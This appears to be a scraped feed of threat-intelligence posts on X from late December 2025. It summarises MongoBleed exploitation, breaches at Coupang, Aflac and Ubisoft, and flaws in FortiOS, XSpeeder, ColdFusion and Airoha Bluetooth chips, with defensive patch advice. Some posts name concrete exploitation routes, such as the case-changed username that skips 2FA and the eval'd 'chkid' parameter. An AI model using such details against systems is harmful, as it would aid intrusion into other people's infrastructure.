(e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32) and watch for scanning on [-----]. 🕷 Malware: mongobleed (PoC exploit tool) 🎯 Target: Global/Database Infrastructure (MongoDB Cloud & Container Deployments) # Category: #MongoDB" [X Link](https://x.com/ThreatSynop/status/2004977713421881660) 2025-12-27T18:08Z [--] followers, [---] engagements "🚨 MongoBleed (CVE-2025-14847): Unauthenticated Heap-Memory Leak Hits MongoDB Servers MongoBleed abuses MongoDBs zlib compression handling to leak uninitialized heap memory to unauthenticated remote clients potentially exposing in-memory sensitive data and aiding follow-on exploitation. Patch to fixed MongoDB versions (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until upgraded. 🕷 Malware: N/A 🎯 Target: Global/Databases & Backend Infrastructure # Category: #MongoDB #MongoBleed #CVE202514847 #Vulnerability #InfoDisclosure #Zlib #DatabaseSecurity" [X Link](https://x.com/ThreatSynop/status/2005128829161943238) 2025-12-28T04:09Z [--] followers, [---] engagements "🚨 Rainbow Six Siege Breach Grants Billions of R6 Credits Forces Ubisoft Shutdown Attackers abused internal moderation/marketplace systems to ban/unban players spoof ban-ticker messages and grant 2B R6 Credits/Renown plus unlock cosmetics prompting Ubisoft to take Siege and the Marketplace offline and roll back transactions since 11:00 UTC. 🕷 Malware: N/A 🎯 Target: Global/Gaming (Ubisoft Rainbow Six Siege) # Category: #Ubisoft #RainbowSixSiege #CyberAttack #GameSecurity #AccountAbuse #IncidentResponse #SupplyChain 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005189288556650988) 2025-12-28T08:09Z [--] followers, [---] engagements "🚨 Ubisoft Confirms Rainbow Six Siege Abuse After Breach Grants Billions of In-Game Credits Attackers reportedly compromised Sieges backend/admin tooling to mass-grant 2B R6 Credits/Renown issue bans/unbans and unlock cosmetics forcing Ubisoft to take servers and the Marketplace offline and roll back impacted transactions while investigating. The incident highlights how privileged tooling abuse (even without malware) can cause large-scale fraud and service disruption. 🕷 Malware: N/A 🎯 Target: Global/Gaming (Ubisoft Rainbow Six Siege) # Category: #Ubisoft #RainbowSixSiege #CyberAttack" [X Link](https://x.com/ThreatSynop/status/2005219548987797807) 2025-12-28T10:09Z [--] followers, [----] engagements "🚨 Security Affairs Newsletter Round 556: LangChain LangGrinch MongoDB CVE-2025-14847 and Trust Wallet Fallout This weekly roundup consolidates high-impact late-December threats including the LangChain-core serialization injection bug enabling secret theft MongoDBs unauthenticated heap-memory leak (CVE-2025-14847) and the Trust Wallet Chrome extension incident plus additional breach/hacktivism and supply-chain updates. Use it as a rapid triage list to prioritize patching credential rotation and monitoring for exploitation across common enterprise and developer stacks. 🕷 Malware: N/A 🎯" [X Link](https://x.com/ThreatSynop/status/2005227162287108459) 2025-12-28T10:39Z [--] followers, [---] engagements "🚨 Troy Hunt Weekly Update 484: IoT Shelly Nirvana Ubiquiti Physical-to-Digital Security and Travel Notes Troys latest weekly update recaps upcoming travel lessons learned while hardening a home IoT setup (Shelly ecosystem) and how physical security overlaps with network security using Ubiquitiuseful reminders that smart environments expand the attack surface across both physical and digital layers. 🕷 Malware: N/A 🎯 Target: Global/Infosec + IoT & Physical Security # Category: #ThreatIntel #IoT #PhysicalSecurity #Ubiquiti #HomeLab #SecurityAwareness #Cybersecurity 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005242867963355493) 2025-12-28T11:42Z [--] followers, [--] engagements "🚨 MongoDB CVE-2025-14847: Unauthenticated Heap-Memory Leak via zlib Compression A MongoDB server-side zlib compression flaw can let unauthenticated clients trigger responses containing uninitialized heap memory risking exposure of sensitive in-memory data and accelerating follow-on exploitation; patch to fixed versions (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until upgraded. 🕷 Malware: N/A 🎯 Target: Global/Databases & Backend Infrastructure # Category: #MongoDB #CVE202514847 #Vulnerability #InfoDisclosure #Zlib #DatabaseSecurity #PatchManagement 🔗" [X Link](https://x.com/ThreatSynop/status/2005582660119257230) 2025-12-29T10:12Z [--] followers, [--] engagements "🚨 MongoBleed Exploited in the Wild: 87K Exposed MongoDB Servers at Risk of Secret Leakage Attackers are actively exploiting MongoBleed (CVE-2025-14847) to remotely leak uninitialized heap memory from MongoDB via zlib compressionpotentially exposing credentials API/cloud keys session tokens and internal configs from internet-exposed instances. Patch immediately (fixed builds available since Dec 19) and hunt for abnormal high-volume connections in MongoDB logs as exploitation can be stealthy and hard to see in SIEMs. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (MongoDB) #" [X Link](https://x.com/ThreatSynop/status/2005583812319678965) 2025-12-29T10:16Z [--] followers, [--] engagements "🚨 MongoBleed (CVE-2025-14847) Exploited After PoC Release 87K+ MongoDB Servers Exposed SecurityWeek reports threat actors began exploiting the unauthenticated MongoDB zlib flaw shortly after technical details and a PoC were released enabling remote leakage of uninitialized heap memory (session tokens passwords API keys). Patch to fixed MongoDB versions (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression and hunt logs for pre-auth exploitation attempts. 🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (Internet-Exposed) # Category: #MongoDB #MongoBleed" [X Link](https://x.com/ThreatSynop/status/2005591981502722366) 2025-12-29T10:49Z [--] followers, [--] engagements "🚨 Superagent: Open-Source Guardrails Framework to Control Agentic AI in Production Superagent helps teams run AI agents with enforced permissions runtime guardrails and full execution logging for auditability and incident response. A built-in Safety Agent evaluates prompts tool calls and outputs in real time against declarative policies to block or modify risky actions before they execute. 🕷 Malware: N/A 🎯 Target: Global/Enterprise (Agentic AI DevSecOps AppSec) # Category: #AgenticAI #AISecurity #LLMSecurity #Guardrails #DevSecOps #AppSec #OpenSource #Governance #Observability 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005593621316169759) 2025-12-29T10:55Z [--] followers, [--] engagements "🚨 MongoBleed Detector Released: Offline Tool Spots CVE-2025-14847 Exploitation in MongoDB Logs An open-source agentless detector (by Neo23x0) scans MongoDB logs offline to flag MongoBleed exploitation by correlating connection/metadata/termination events (IDs 22943/51800/22944) and spotting the key anomaly: high-volume connections that never send client metadata. This matters because it enables rapid IR triage across many hosts (including rotated .gz logs) and prioritizes likely-active exploitation using severity thresholds (e.g. [---] conns 10% metadata 400/min bursts). 🕷 Malware: N/A 🎯" [X Link](https://x.com/ThreatSynop/status/2005596357092905382) 2025-12-29T11:06Z [--] followers, [--] engagements "🚨 MongoBleed Detector Released: Offline Log Scanner Flags CVE-2025-14847 Exploitation The new open-source MongoBleed detector scans MongoDB JSON logs offline to spot exploitation patterns by correlating connection accepted (22943) client metadata (51800) and connection closed (22944) eventsflagging high-volume bursts where attackers extract memory and disconnect without sending metadata. It supports compressed logs IPv4/IPv6 severity scoring (HIGH/MEDIUM/LOW/INFO) and optional SSH-based remote scanning to triage fleets quickly. 🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (4.48.2.2) #" [X Link](https://x.com/ThreatSynop/status/2005598056503214138) 2025-12-29T11:13Z [--] followers, [--] engagements "🚨 MongoBleed Exploited in the Wild: Pre-Auth MongoDB Memory Leak Exposes Secrets MongoDBs CVE-2025-14847 is now actively exploited letting unauthenticated attackers abuse zlib message decompression (length-field mishandling) to extract uninitialized heap memory that may contain credentials and other sensitive data from internet-exposed servers. Upgrade immediately to fixed releases (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until patched. 🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (Internet-Exposed) # Category: #MongoDB #MongoBleed #CVE202514847" [X Link](https://x.com/ThreatSynop/status/2005599702549483571) 2025-12-29T11:20Z [--] followers, [--] engagements "🚨 MongoBleed Exploited in the Wild: Pre-Auth MongoDB Memory Leak Exposes Secrets MongoDBs CVE-2025-14847 is now actively exploited letting unauthenticated attackers abuse zlib message decompression (length-field mishandling) to extract uninitialized heap memory that may contain credentials and other sensitive data from internet-exposed servers. Upgrade immediately to fixed releases (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until patched. 🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (Internet-Exposed) # Category: #MongoDB #MongoBleed #CVE202514847" [X Link](https://x.com/ThreatSynop/status/2005629909775819119) 2025-12-29T13:20Z [--] followers, [--] engagements "🚨 Fortinet Warns: 5-Year-Old FortiOS SSL-VPN 2FA Bypass Still Actively Exploited (CVE-2020-12812) Attackers can bypass FortiToken 2FA on vulnerable FortiGate SSL-VPN by changing the usernames letter case in specific local user + LDAP group configurations effectively authenticating without a second factor. Patch immediately (fixed FortiOS builds available since 2020) and remove unnecessary secondary LDAP groups / disable username case-sensitivity if you cannot upgrade. 🕷 Malware: N/A 🎯 Target: Global/Organizations Running FortiGate SSL-VPN with LDAP + 2FA # Category: #Fortinet #FortiOS" [X Link](https://x.com/ThreatSynop/status/2005631547567739301) 2025-12-29T13:26Z [--] followers, [--] engagements "🚨 Microsoft Copilot Adds GPT-5.2 as New Smart Plus Mode Microsoft is rolling out GPT-5.2 (a Thinking variant) in Copilot across web Windows and mobile as a free upgrade alongside GPT-5.1. The update aims to improve complex reasoning and knowledge-work tasks like document analysis coding and generating spreadsheets/presentations. 🕷 Malware: N/A (AI model rollout: GPT-5.2) 🎯 Target: Global/Productivity (Microsoft Copilot users) # Category: #Microsoft #Copilot #AI #GPT52 #GenAI #Windows #ProductUpdate 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005634820127260703) 2025-12-29T13:39Z [--] followers, [--] engagements "🚨 Coupang Announces $1.17B Voucher Payout After 33.7M-Account Data Breach Coupang says an intrusion (discovered Nov 18) exposed customer PIIincluding names phone numbers delivery/email addresses and some order historiesimpacting up to [----] million Korea-based accounts. Starting Jan [--] [----] it will issue [-----] vouchers per affected user ($1.17B total) underscoring the scale of large-platform PII exposure and the business/regulatory fallout of voucher-based remediation. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce (Coupang customers) # Category: #DataBreach #Coupang #Privacy #PII" [X Link](https://x.com/ThreatSynop/status/2005634886170800344) 2025-12-29T13:39Z [--] followers, [--] engagements "🚨 Aflac Data Breach Exposes 22.65M Records After June [----] Intrusion Aflac says attackers accessed and exfiltrated data tied to [-----] million individuals after suspicious activity was detected on June [--] [----] impacting customers beneficiaries employees and agents; no ransomware encryption was observed. Stolen data includes SSNs DOB addresses drivers license/government IDs and medical/health insurance inforaising high identity-theft and medical-fraud risk and aligning with a broader campaign hitting the insurance sector. 🕷 Malware: N/A 🎯 Target: USA / Insurance # Category: #DataBreach" [X Link](https://x.com/ThreatSynop/status/2005636519780893111) 2025-12-29T13:46Z [--] followers, [--] engagements "🚨 Malware in [----] Breaks Out of Windows: Android Banking Trojans + macOS ClickFix Surge Malwarebytes reports 2025s malware shifted heavily to Android and macOShighlighting advanced Android banking trojans using overlays and human-like interaction tricks plus the ClickFix social-engineering technique spreading macOS stealers. The trend is accelerated by cross-platform malware built in Rust/Go and MaaS ecosystems expanding reach to mobile Linux and IoT. 🕷 Malware: Multiple (Herodotus Lumma AMOS Rhadamanthys) 🎯 Target: Global / Mobile & macOS Users # Category: #Malware #Android #macOS" [X Link](https://x.com/ThreatSynop/status/2005637068387471651) 2025-12-29T13:48Z [--] followers, [--] engagements "🚨 Check Point Weekly Threat Intel: Major Breaches Critical Vulns and Active Phishing/Malware Campaigns Check Points Dec [--] bulletin highlights disruptive incidents (ransomware encrypting Romanian Waters IT estate a La Poste outage claimed by NoName057(16) and Aflacs 22.7M-record breach) alongside high-impact flaws in MongoDB (MongoBleed) LangChain Core deserialization and Net-SNMP snmptrapd. It also flags active campaigns abusing Google Cloud Send Email workflows for credential phishing and long-running MgBot/Webrat activity delivered via DNS poisoning and fake GitHub PoCs. 🕷 Malware: MgBot" [X Link](https://x.com/ThreatSynop/status/2005637617031770215) 2025-12-29T13:50Z [--] followers, [--] engagements "🚨 Coupang Recovers Smashed Laptop Allegedly Used in Insider Data Breach Coupang says it recovered a smashed laptopreportedly weighted down and dumped in a riverlinked to an alleged insider leak and handed it to authorities as part of the investigation. The case underscores how insider access plus attempted evidence destruction can complicate breach containment attribution and legal response. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #InsiderThreat #DigitalForensics #IncidentResponse #EvidenceHandling #Coupang #SouthKorea 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005646386130194867) 2025-12-29T14:25Z [--] followers, [--] engagements "🚨 Korean Air Employee Data Exposed After KC&D Supplier Hack Linked to Clop Korean Air disclosed that a breach at its catering partner KC&D exposed employee data stored in an ERP system including names and bank account numbers with local reporting suggesting [-----] records were exfiltrated. Clop has claimed responsibility and allegedly published the stolen data increasing risk of targeted fraud and impersonation attempts against staff. 🕷 Malware: Clop (ransomware/extortion gang) 🎯 Target: South Korea / Aviation (Employees) # Category: #DataBreach #KoreanAir #Clop #Extortion #OracleEBS" [X Link](https://x.com/ThreatSynop/status/2005646935714074674) 2025-12-29T14:27Z [--] followers, [--] engagements "🚨 [--] Threats That Shaped Cybersecurity in 2025: From Telecom Espionage to React2Shell Dark Reading outlines five defining threats: China-linked Salt Typhoons ongoing telecom intrusions major CISA budget/layoff impacts the critical React2Shell (CVE-2025-55182) deserialization flaw self-propagating open-source malware like Shai-Hulud and supply-chain-style attacks abusing Salesforce integrations and OAuth tokens. 🕷 Malware: Shai-Hulud 🎯 Target: Global / Enterprise (Telecom + SaaS ecosystems) # Category: #ThreatIntel #SaltTyphoon #APT #CISA #React2Shell #CVE2025-55182 #Vulnerability" [X Link](https://x.com/ThreatSynop/status/2005647480591982981) 2025-12-29T14:29Z [--] followers, [--] engagements "🚨 Fortinet Warns of New Attacks Exploiting Old FortiOS 2FA Bypass (CVE-2020-12812) Fortinet reports renewed exploitation of CVE-2020-12812 where attackers can bypass FortiOS two-factor authentication in certain LDAP/remote-auth configurations by altering username case to avoid the 2FA prompt. This matters because it enables account compromise of FortiGate access paths (often internet-exposed) accelerating follow-on intrusion activity if admins havent patched or hardened affected setups. 🕷 Malware: N/A 🎯 Target: Global / Enterprise (FortiOS/FortiGate deployments) # Category: #Fortinet" [X Link](https://x.com/ThreatSynop/status/2005648025058787375) 2025-12-29T14:32Z [--] followers, [--] engagements "🚨 MongoBleed Exploited in the Wild: 87K+ MongoDB Servers Potentially Exposed Researchers report active exploitation of MongoBleed (CVE-2025-14847) a zlib decompression flaw that lets unauthenticated attackers leak uninitialized heap memory from MongoDBrisking exposure of secrets like credentials tokens and API keys. Patch immediately (fixed builds include 8.2.3/8.0.17/7.0.28/6.0.27/5.0.32/4.4.30) or disable zlib compression as a short-term mitigation. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / MongoDB (exposed database servers) # Category: #MongoDB #MongoBleed #CVE2025_14847" [X Link](https://x.com/ThreatSynop/status/2005648569060008286) 2025-12-29T14:34Z [--] followers, [--] engagements "🚨 K3 UltraMulti EDC Keychain Tool Review: Flashlight + UV + Laser + Igniter in a Pocket Gadget A compact (40g) keychain tool combining an 800-lumen beam 365nm UV red laser side flood/RGB lights magnetic mount/clip USB-C recharge and a short-duration ignition module. The main value is always-on-you utility but treat the igniter and laser as safety/compliance considerations depending on your environment. 🕷 Malware: N/A 🎯 Target: Global / Consumer EDC # Category: #EDC #Multitool #Flashlight #UVLight #LaserPointer #EverydayCarry #Gadgets 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005711207102042189) 2025-12-29T18:43Z [--] followers, [--] engagements "🚨 Korean Air Employee Data Exposed After KC&D Supplier Breach Linked to Clop Korean Air says its former catering/duty-free unit KC&D was hacked leaking employee data (including names and bank account numbers) from an ERP server with [-----] staff potentially affected. Clop has claimed responsibility reinforcing how third-party compromises can quickly translate into high-risk fraud and impersonation exposure for employees. 🕷 Malware: Clop (ransomware/extortion gang) 🎯 Target: South Korea / Aviation (Employees) # Category: #DataBreach #KoreanAir #Clop #ThirdPartyRisk #SupplyChainAttack #ERP" [X Link](https://x.com/ThreatSynop/status/2005711752609063134) 2025-12-29T18:45Z [--] followers, [--] engagements "🚨 Weekly Recap: MongoDB Attacks Wallet Breaches Android Spyware Insider Crime & More This weekly recap rounds up late-2025 threats including active exploitation of MongoDB MongoBleed (CVE-2025-14847) a Trust Wallet Chrome extension compromise Evasive Panda DNS poisoning to deliver MgBot and renewed FortiOS 2FA-bypass abuseshowing how attackers are chaining old flaws SaaS keys and supply-chain exposure faster than defenders patch. 🕷 Malware: MongoBleed (CVE-2025-14847) MgBot 🎯 Target: Global / Multi-sector # Category: #ThreatIntel #MongoDB #MongoBleed #CVE2025_14847 #TrustWallet" [X Link](https://x.com/ThreatSynop/status/2005713389931118974) 2025-12-29T18:51Z [--] followers, [---] engagements "🚨 Linux & Open Source [----] Outlook: Desktop Growth Rust Momentum and a Firefox Cliff The article forecasts continued Linux desktop growth in [----] stronger open-source security and wider use of AI to assist (not replace) Linux kernel developmentwhile warning Firefox faces serious pressure. This matters because rising adoption and supply-chain complexity will force faster hardening better maintenance and clearer trust signals across core open-source projects. 🕷 Malware: N/A 🎯 Target: Global / Linux & Open Source Ecosystem # Category: #Linux #OpenSource #Cybersecurity #Rust #DesktopLinux #AI" [X Link](https://x.com/ThreatSynop/status/2005713451050573825) 2025-12-29T18:52Z [--] followers, [--] engagements "🚨 Critical XSpeeder 0-Day (CVE-2025-54322) Exposes 70K Edge Devices as Vendor Stays Silent Researchers disclosed an unauthenticated 0-day in XSpeeder SXZOS where injecting payloads into the chkid parameter of can yield remote command execution with full root control. With no patch after 7+ months of disclosure attempts and [-----] devices exposed online this enables rapid network takeover traffic interception and disruption in industrial/branch environments. 🕷 Malware: CVE-2025-54322 (XSpeeder SXZOS 0-day RCE) 🎯 Target: Global / Industrial & Branch Networks (Routers SD-WAN Edge devices) #" [X Link](https://x.com/ThreatSynop/status/2005713994057654710) 2025-12-29T18:54Z [--] followers, [--] engagements "🚨 Trust Wallet: [----] Wallets Drained After Malicious Chrome Extension Update Attackers compromised Trust Wallets Chrome extension v2.68.0 by injecting malicious JavaScript that exfiltrated wallet data leading to roughly $7M stolen from [----] wallet addresses. Trust Wallet urges immediate updates to v2.69 warns of follow-on phishing scams and says it is reimbursing verified victims. 🕷 Malware: Malicious Trust Wallet Chrome extension v2.68.0 (JS data exfiltration) 🎯 Target: Global / Crypto users (Chrome extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension" [X Link](https://x.com/ThreatSynop/status/2005715082748280903) 2025-12-29T18:58Z [--] followers, [--] engagements "🚨 ChatGPT Mobile Adds Thinking Time Toggle for Standard vs Extended Reasoning OpenAI is rolling out a mobile update that finally lets Plus users choose between Standard and Extended Thinking aligning the Android experience with desktop for deeper longer reasoning on complex prompts. The change matters because it makes more compute when needed a user-controlled setting on mobile reducing silent downgrades and improving output consistency across devices. 🕷 Malware: N/A 🎯 Target: Global / AI Productivity (ChatGPT mobile users) # Category: #OpenAI #ChatGPT #MobileSecurity #AI #LLM" [X Link](https://x.com/ThreatSynop/status/2005715689282457864) 2025-12-29T19:00Z [--] followers, [--] engagements "🚨 Top US Accounting Firm Sax Discloses [----] Breach Impacting 220000+ Sax LLP says hackers accessed its network in late July/August [----] and stole files affecting [------] people with exposed data potentially including SSNs DOB drivers license/state IDs and passport numbers. The 16-month disclosure delay increases identity-theft risk because stolen PII is typically monetized quickly. 🕷 Malware: N/A 🎯 Target: USA / Accounting & Advisory (Clients/Individuals) # Category: #DataBreach #PII #IdentityTheft #Accounting #US #IncidentResponse #RiskManagement 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005716843600756753) 2025-12-29T19:05Z [--] followers, [--] engagements "🚨 Hacker Dumped MacBook in River to Destroy Evidence in Coupang Data Theft Case Investigators say a former Coupang employee attempted to destroy evidence of a major data-theft incident by throwing a MacBook Air into a river but authorities recovered the device for forensic analysis. The case underscores how insider access plus attempted evidence destruction can complicate attribution containment and legal response. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #InsiderThreat #DigitalForensics #IncidentResponse #EvidenceHandling #Coupang 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005717388436677031) 2025-12-29T19:07Z [--] followers, [--] engagements "🚨 2.5M+ Exploit Attempts Slam Adobe ColdFusion Servers in Holiday Attack Wave Researchers observed a coordinated campaign firing 2.5+ million malicious requeststimed heavily on Christmas Dayprobing Adobe ColdFusion and [--] other stacks across [---] vulnerabilities. The actors used out-of-band callbacks (Interactsh) and targeted multiple ColdFusion RCE/bypass CVEs (e.g. CVE-2023-26359 CVE-2023-38205 CVE-2023-44353) consistent with initial-access-broker style scanning to quickly identify systems for follow-on compromise. 🕷 Malware: N/A (ProjectDiscovery Interactsh OAST + exploit-scanning) 🎯" [X Link](https://x.com/ThreatSynop/status/2005717450717905132) 2025-12-29T19:07Z [--] followers, [--] engagements "🚨 Critical XSpeeder SXZOS Zero-Day RCE Exposes 70000+ Internet-Facing Network Devices A pre-auth zero-day (CVE-2025-54322) in XSpeeder SXZOS networking devices enables unauthenticated attackers to execute arbitrary commands as root via a vulnerable web auth endpoint that unsafely eval()s base64-decoded input. With no patch available and tens of thousands of exposed hosts (common in industrial/branch environments) this is a high-probability mass-exploitation risk for initial access and full device takeover. 🕷 Malware: CVE-2025-54322 (XSpeeder SXZOS pre-auth Root RCE) 🎯 Target: Global /" [X Link](https://x.com/ThreatSynop/status/2005725062612300220) 2025-12-29T19:38Z [--] followers, [--] engagements "🚨 Airoha Bluetooth Headphone Flaws Let Attackers Hijack Paired Smartphones Three bugs (CVE-2025-20700/20701/20702) in Airohas RACE protocol allow nearby attackers to connect without authentication gain arbitrary memory read/write and extract the Bluetooth link key to impersonate trusted headphones. This can enable call/audio hijacking contact/call-log access and voice-assistant abuse on connected phones. 🕷 Malware: Airoha RACE protocol vulnerabilities (CVE-2025-20700 CVE-2025-20701 CVE-2025-20702) 🎯 Target: Global / Bluetooth Headphones & Connected Smartphones # Category: #Bluetooth" [X Link](https://x.com/ThreatSynop/status/2005725607272059382) 2025-12-29T19:40Z [--] followers, [--] engagements "🚨 Ubisoft Confirms Rainbow Six Siege Server Intrusion Tied to MongoBleed (CVE-2025-14847) Attackers exploited the MongoBleed MongoDB memory-disclosure flaw to tamper with Rainbow Six Siege infrastructure triggering mass account manipulation (credits/skins) ban-system abuse and service disruption. Reports also indicate follow-on actors may have leveraged the same weakness to steal large volumes of internal data escalating long-term IP and cheat-development risk. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Gaming (Ubisoft Rainbow Six Siege) # Category: #Ubisoft #RainbowSixSiege" [X Link](https://x.com/ThreatSynop/status/2005726702815560045) 2025-12-29T19:44Z [--] followers, [---] engagements "🚨 AI-Powered Mycelial Mage Phishing Kit Targets Microsoft Outlook Credentials A Spanish-language phishing kit dubbed Mycelial Mage is stealing Outlook logins enriching them with IP/geolocation and exfiltrating via Telegram bots and increasingly via Discord webhooks to reduce forensic visibility. The toolkit also adds anti-analysis defenses (devtools traps console hijacking regex backtracking) and shows signs of AI-assisted module development. 🕷 Malware: Mycelial Mage (phishing kit) 🎯 Target: Global / Microsoft Outlook users (Spanish-speaking regions) # Category: #Phishing #CredentialTheft" [X Link](https://x.com/ThreatSynop/status/2005727246162559039) 2025-12-29T19:46Z [--] followers, [--] engagements "🚨 OpenAI Hardens ChatGPT Atlas to Resist Prompt-Injection Attacks OpenAI rolled out a security update for its browser-based ChatGPT Atlas agent that combines an adversarially trained model with stronger safeguards to detect and block prompt-injection attempts. The company is also scaling automated reinforcement-learning red teaming to discover novel multi-step attack strategies early and ship mitigations faster. 🕷 Malware: N/A 🎯 Target: Global / AI Agents (Browser-based automation) # Category: #OpenAI #ChatGPT #Atlas #PromptInjection #AgenticAI #AIsecurity #RedTeaming #AppSec 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005728339676614673) 2025-12-29T19:51Z [--] followers, [--] engagements "🚨 2.5M+ Holiday Exploit Probes Hit Adobe ColdFusion in Coordinated Recon Campaign A threat actor ran a Christmas-week scanning operation generating 2.5M+ malicious requests across 47+ platforms including [----] ColdFusion-focused requests across [--] countries (68% of sessions in the U.S.). The campaign abused WDDX deserialization to trigger JNDI/LDAP injection (JdbcRowSetImpl gadget chain) and used Interactsh/OAST domains for callback verificationclassic initial-access-broker recon ahead of downstream intrusions. 🕷 Malware: N/A (Exploit-scanning; Interactsh/Nuclei-like tooling) 🎯 Target:" [X Link](https://x.com/ThreatSynop/status/2005729429465526433) 2025-12-29T19:55Z [--] followers, [--] engagements "🚨 Bluetooth Headphone Flaws Let Attackers Hijack Connected Smartphones Researchers disclosed three Airoha SoC issues (CVE-2025-20700/20701/20702) that allow nearby attackers to access the RACE protocol without proper authentication then extract the Bluetooth Link Key and impersonate trusted headphones to abuse the paired phone. This can enable covert eavesdropping and actions like call/audio hijack and voice-assistant abuse across popular brands. 🕷 Malware: N/A (Airoha RACE protocol vulnerabilities: CVE-2025-20700 CVE-2025-20701 CVE-2025-20702) 🎯 Target: Global / Bluetooth Headphones &" [X Link](https://x.com/ThreatSynop/status/2005729973982917064) 2025-12-29T19:57Z [--] followers, [--] engagements "🚨 Hacktivist Proxy Ops Become a Repeatable Playbook for Geopolitical Cyber Pressure Report highlights a repeatable model where hacktivist campaigns surge immediately after geopolitical triggers (sanctions military aid diplomatic events) using low-complexity DDoS/defacement/claimed leaks to maximize public disruption and plausible deniability. The risk is sustained operational and psychological pressure on public-facing services (gov finance transport media) that forces reactive defense and drains IR capacity. 🕷 Malware: N/A 🎯 Target: Global / Government & Critical Services # Category:" [X Link](https://x.com/ThreatSynop/status/2005730522836918521) 2025-12-29T19:59Z [--] followers, [--] engagements "🚨 Coupang Data Breach Suspect Dumped MacBook in River Investigators Recovered It The suspected actor behind Coupangs personal data leak allegedly threw a MacBook Air into a river to destroy evidence but it was recovered and is being used for forensic investigation. The case highlights how insider-driven breaches often include anti-forensics making rapid evidence preservation critical for attribution and legal action. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #Coupang #InsiderThreat #DigitalForensics #IncidentResponse #EvidenceHandling #SouthKorea 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005731073129320811) 2025-12-29T20:02Z [--] followers, [--] engagements "🚨 Aflac Data Breach Exposes 22M People in Major Cyber Breach Aflac confirmed a June [----] intrusion impacted [--] million people exposing sensitive PII and medical/claims-related data across customers employees agents and beneficiaries. The company says it contained the attack quickly and is offering impacted individuals two years of identity/medical-fraud protection services. 🕷 Malware: N/A 🎯 Target: USA / Insurance # Category: #DataBreach #Aflac #PII #HealthData #IdentityTheft #MedicalFraud #IncidentResponse #Cybercrime 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005762969209328071) 2025-12-29T22:08Z [--] followers, [--] engagements "🚨 AI Slop and Brainrot Are Flooding YouTube ShortsAnd the Algorithm Is Rewarding It A Kapwing analysis found that roughly [--] in [--] Shorts shown to new users qualifies as low-quality AI-generated slop while about a third of early recommendations fall into brainrot attention-farming content. The report argues the incentives (cheap production + reliable reach) are accelerating spam-like content factories degrading discovery quality and increasing misinformation risk at scale. 🕷 Malware: N/A 🎯 Target: Global / Social Media (YouTube) # Category: #AISlop #Brainrot #YouTubeShorts #ContentIntegrity" [X Link](https://x.com/ThreatSynop/status/2005764117882364138) 2025-12-29T22:13Z [--] followers, [--] engagements "🚨 Ubisoft Shuts Down Rainbow Six Siege After MongoDB Exploit Hits Players Attackers abused the MongoBleed MongoDB memory-leak flaw to compromise Rainbow Six Siege backend systems enabling disruptive actions like mass credit grants bans/unbans and in-game manipulation. The incident shows how a single internet-exposed database weakness can translate into full platform-level takeover and large-scale user impact. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Gaming (Ubisoft Rainbow Six Siege players) # Category: #Ubisoft #RainbowSixSiege #MongoDB #MongoBleed #CVE2025_14847 #Exploit" [X Link](https://x.com/ThreatSynop/status/2005773363877146781) 2025-12-29T22:50Z [--] followers, [---] engagements "🚨 Coupang to Pay $1.1B in Vouchers After Massive Customer Data Breach Coupang announced a 1.685T ($1.1B) voucher compensation plan for 33.7M notified accounts after a major personal data exposure with distribution starting January [--] [----]. The move underscores the scale of breach fallout in large consumer platformswhere remediation costs regulatory scrutiny and trust erosion can exceed the technical incident itself. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #Coupang #Privacy #PII #SouthKorea #Ecommerce #IncidentResponse 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005773908067184655) 2025-12-29T22:52Z [--] followers, [--] engagements "🚨 Elevation Lab TimeCapsule Review: Give AirTags a 5-Year Battery Without the Bulk Elevation Labs compact TimeCapsule replaces the AirTags CR2032 with AAA lithium cells in an IP69-sealed case extending battery life to [--] years while keeping the tracker usable for travel/gear tracking. The tradeoff is slightly reduced speaker volume but it materially lowers battery died at the worst time risk for long-term asset tracking. 🕷 Malware: N/A 🎯 Target: Global / Consumer Tracking (Apple AirTag users) # Category: #Apple #AirTag #Security #AssetTracking #Privacy #Bluetooth #Gadgets #Review 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005774997483315437) 2025-12-29T22:56Z [--] followers, [--] engagements "🚨 MongoBleed Exploitation Spreads as Defenders Race to Patch MongoDB CyberScoop reports MongoBleed (CVE-2025-14847)a zlib-driven unauthenticated memory-leak in widely deployed MongoDB versionsis now under active exploitation with CISA adding it to KEV after a public PoC dropped Dec [--]. With tens of thousands of exposed instances (Shadowserver 75K; Censys 87K) and bleed-style low-forensic footprint stolen secrets 